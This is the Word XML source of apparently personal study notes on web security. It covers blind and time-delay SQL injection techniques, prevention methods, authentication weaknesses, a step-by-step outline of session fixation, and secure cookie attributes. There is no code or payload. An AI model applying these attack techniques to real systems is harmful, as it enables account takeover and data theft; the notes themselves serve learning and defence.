      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Can use null to get column types as if an error occurs, we have the same data type</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9D39FF" w14:textId="52EF8FB2" w:rsidR="0046513D" w:rsidRPr="000C14C1" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Boolean: Use bool </w:t>
      </w:r>
      <w:r>
        <w:t>conditions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> to verify certain conditions are T/F</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D934DD" w14:textId="7DA7E12E" w:rsidR="000C14C1" w:rsidRPr="0046513D" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Useful for blind attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DB03EF" w14:textId="216C9F1C" w:rsidR="0046513D" w:rsidRDefault="0046513D" w:rsidP="0046513D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Time delay: Use DB commands to delay answers in conditional queries. Used when attacker has no sort of answer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F81907E" w14:textId="113E5EE3" w:rsidR="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Useful for determining conditions as if a delay occurs, our condition is false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A8C41F" w14:textId="313FBCDC" w:rsidR="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Prevention methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425EB994" w14:textId="66682AC0" w:rsidR="000C14C1" w:rsidRPr="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameterised queries: </w:t>
      </w:r>
      <w:r w:rsidRPr="000C14C1">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Define SQL code and then pass in each parameter to the query after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000C14C1">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>allowing for the designation between code and dat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409DE233" w14:textId="701ECD52" w:rsidR="000C14C1" w:rsidRPr="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Stored procedures: SQL code which is defined and stored in DB itself then called</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3356D8" w14:textId="7B11E995" w:rsidR="000C14C1" w:rsidRPr="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Whitelist input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65794F43" w14:textId="36D93E2D" w:rsidR="000C14C1" w:rsidRPr="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Escaping user supplied input</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E25941B" w14:textId="25EBDB62" w:rsidR="000C14C1" w:rsidRPr="000C14C1" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Avoid detailed error messages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5430514B" w14:textId="14FD5966" w:rsidR="000C14C1" w:rsidRPr="005376C0" w:rsidRDefault="000C14C1" w:rsidP="000C14C1">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">Enforce Least </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>privilege</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25759272" w14:textId="22B52F4C" w:rsidR="005376C0" w:rsidRDefault="005376C0" w:rsidP="005376C0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>Broken Authentication and Session Management</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C847D1" w14:textId="181CDB1F" w:rsidR="008C74CC" w:rsidRDefault="00474112" w:rsidP="005376C0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Reasons we fail to protect Username, Password </w:t>
      </w:r>
      <w:r w:rsidR="00134CFC">
        <w:t>and Session</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="786D9EFB" w14:textId="189163D6" w:rsidR="00474112" w:rsidRDefault="00134CFC" w:rsidP="00474112">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unencrypted application connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56815E16" w14:textId="6D325D72" w:rsidR="00134CFC" w:rsidRDefault="00134CFC" w:rsidP="00134CFC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MiTM can intercept credentials</w:t>
      </w:r>
      <w:r w:rsidR="00904A8B">
        <w:t xml:space="preserve"> that is being sent or received</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269B2D1D" w14:textId="094F82F6" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00134CFC">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>To prevent this, enable TLS/SSL on server and set secure flags on cookies to prevent unauthorised observation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210791A6" w14:textId="31ECFCA0" w:rsidR="00134CFC" w:rsidRDefault="00134CFC" w:rsidP="00474112">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Easy to guess login details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5976C0CF" w14:textId="04D0839A" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Users must use a strong password and change default passwords to avoid this</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D059C0B" w14:textId="29B5095F" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Length 8 passwords are most common length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD485FC" w14:textId="6333F49F" w:rsidR="00134CFC" w:rsidRDefault="00134CFC" w:rsidP="00474112">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Unprotected password/usernames when stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361D3BD" w14:textId="00CB04AE" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Occurs if file it is stored in isn’t properly hashed/encrypted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F863BE" w14:textId="15AE9DB9" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use Salt and hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F22F8" w14:textId="6CA14FC8" w:rsidR="00134CFC" w:rsidRDefault="00134CFC" w:rsidP="00474112">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Session ID is in URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE7C773" w14:textId="7352758B" w:rsidR="00134CFC" w:rsidRDefault="00134CFC" w:rsidP="00474112">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134CFC">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">Session values don’t time out </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>or not invalidated after logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FC570D" w14:textId="550B58C2" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B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Leaves Session ID vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="008C457B" w14:textId="16444B65" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B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Set a timeout on session ID to circumvent or the app itself can invalidate it upon logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC681E7" w14:textId="23DD74B8" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B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Session fixation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563A85D0" w14:textId="595BEDD4" w:rsidR="00904A8B" w:rsidRPr="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>The attacker logs into web server..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267439A9" w14:textId="6797F861" w:rsidR="00904A8B" w:rsidRPr="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Server issues a session ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D45AECA" w14:textId="55A7036E" w:rsidR="00904A8B" w:rsidRPr="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">Attacker has to send a link with the established session ID </w:t>
      </w:r>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">to the victim, victim clicks on the link sent from the attacker </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ADE5C90" w14:textId="49D93BCE" w:rsidR="00904A8B" w:rsidRPr="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Server sees that session was already established and a new one need not to be created. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8DBA17" w14:textId="5B6311E6" w:rsidR="00904A8B" w:rsidRPr="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Victim provides credentials to the Web Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E34F0C" w14:textId="2A28433F" w:rsidR="00904A8B" w:rsidRPr="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00904A8B">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t xml:space="preserve">Knowing the user's account and the session ID, the attacker gains access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29154145" w14:textId="3F9E376A" w:rsidR="00904A8B" w:rsidRDefault="00904A8B" w:rsidP="00904A8B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 xml:space="preserve">To prevent session fixation: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CEDCC7" w14:textId="4AC069E1" w:rsidR="00134CFC" w:rsidRDefault="00904A8B" w:rsidP="00904A8B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Code web app so it assigns a different session cookie immediately after user authenticates application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A726456" w14:textId="75A03F23" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00904A8B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Session Management pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AA060B" w14:textId="12816E55" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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 xml:space="preserve">Session ID </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79030AC1" w14:textId="739BA8DC" w:rsidR="00904A8B" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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name value pair</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A06B31A" w14:textId="036FE803" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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Shouldn’t be too descriptive or have unnecessary details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD19A0" w14:textId="31CFA952" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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 xml:space="preserve">Should be long and unpredictable </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3E88B8" w14:textId="430E312D" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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Its contents must be meaningless</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0BEC24" w14:textId="112F5985" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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Session Management Implementation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299986BA" w14:textId="056DD05E" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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How the exchange mechanism to be used between user and application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FC6F98" w14:textId="02E51452" w:rsidR="00CB2A76" w:rsidRDefault="00CB2A76" w:rsidP="00CB2A76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Mechanisms in HTT</w:t>
      </w:r>
      <w:r w:rsidR="0085376C">
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>P help maintain session state in web apps such as cookies, URL parameters and arguments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CAF8479" w14:textId="10ACA0F6" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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Access controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428B50E1" w14:textId="5548BA01" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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lastRenderedPageBreak/>
        <w:t>TLS is in here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E447801" w14:textId="12C1102C" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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 xml:space="preserve">Its pivotal in protecting ID exchange </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F779D3E" w14:textId="79EE7355" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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Prevents active eavesdropping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A93DFFE" w14:textId="2F58D2CF" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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Needs to be done for entire web session and not just authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D9F917" w14:textId="1DC41F99" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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Cookies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F85F9EE" w14:textId="7DAE7C8B" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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Secure Attribute: Only send cookie data via HTTPS connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DB1B926" w14:textId="542EEE6E" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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HttpOnly attribute: Not allow client side scripts to access cookie</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C64934" w14:textId="08C1F56E" w:rsidR="0085376C" w:rsidRDefault="0085376C" w:rsidP="0085376C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Domain and Path Attributes: Only send cookies to specified domain and its subdomains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2931EF76" w14:textId="29C706A2" w:rsidR="0085376C" w:rsidRPr="00134CFC" w:rsidRDefault="0085376C" w:rsidP="0085376C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
        <w:t>Expire and Max-age attributes: Store cookies on disk until expiration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA25362" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRPr="00134CFC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D2DBA34" w14:textId="77777777" w:rsidR="008C74CC" w:rsidRPr="00134CFC" w:rsidRDefault="008C74CC" w:rsidP="008C74CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="544BB8CC" w14:textId="77777777" w:rsidR="00A32A69" w:rsidRPr="00134CFC" w:rsidRDefault="00A32A69" w:rsidP="00A32A69">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2160"/>
        <w:rPr>
          <w:lang w:val="en-IE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A32A69" w:rsidRPr="00134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088"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E62E0E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1DEA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B3488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35F4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="140444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75ED4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="77461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2D13"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C8D88B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6ED8"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24B0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55C49"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4B50D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51486">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1846742462">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1218855162">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="60325660">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="885525715">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="953902782">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="25756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93"/>
    <w:rsid w:val="000941AB"/>
    <w:rsid w:val="000C14C1"/>
    <w:rsid w:val="00134CFC"/>
    <w:rsid w:val="001620BC"/>
    <w:rsid w:val="001D376A"/>
    <w:rsid w:val="00237FBB"/>
    <w:rsid w:val="00241AA9"/>
    <w:rsid w:val="003B5116"/>
    <w:rsid w:val="003F62B3"/>
    <w:rsid w:val="00402131"/>
    <w:rsid w:val="00452E14"/>
    <w:rsid w:val="0046513D"/>
    <w:rsid w:val="00474112"/>
    <w:rsid w:val="004C64A5"/>
    <w:rsid w:val="004F2A27"/>
    <w:rsid w:val="005376C0"/>
    <w:rsid w:val="0054260F"/>
    <w:rsid w:val="00543599"/>
    <w:rsid w:val="005F60C4"/>
    <w:rsid w:val="00603C36"/>
    <w:rsid w:val="00631444"/>
    <w:rsid w:val="0069369E"/>
    <w:rsid w:val="006A0C80"/>
    <w:rsid w:val="006D70B7"/>
    <w:rsid w:val="006E6B58"/>
    <w:rsid w:val="00754BFA"/>
    <w:rsid w:val="0085376C"/>
    <w:rsid w:val="008C74CC"/>
    <w:rsid w:val="00904A8B"/>
    <w:rsid w:val="00A14D21"/>
    <w:rsid w:val="00A32A69"/>
    <w:rsid w:val="00A45BF6"/>
    <w:rsid w:val="00A52871"/>
    <w:rsid w:val="00AB6B98"/>
    <w:rsid w:val="00AD39B4"/>
    <w:rsid w:val="00B96893"/>
    <w:rsid w:val="00C379D3"/>
    <w:rsid w:val="00CB2A76"/>
    <w:rsid w:val="00CF615B"/>
    <w:rsid w:val="00E0422F"/>
    <w:rsid w:val="00E3415B"/>
    <w:rsid w:val="00E74A09"/>
    <w:rsid w:val="00F10E40"/>
    <w:rsid w:val="00FB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130F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{F252DDA5-B0F4-4F02-8CBF-BE67BFB6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8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A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4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3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10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6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-02-06T19:10:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-01T18:23:00Z</dcterms:modified>
</cp:coreProperties>
</file>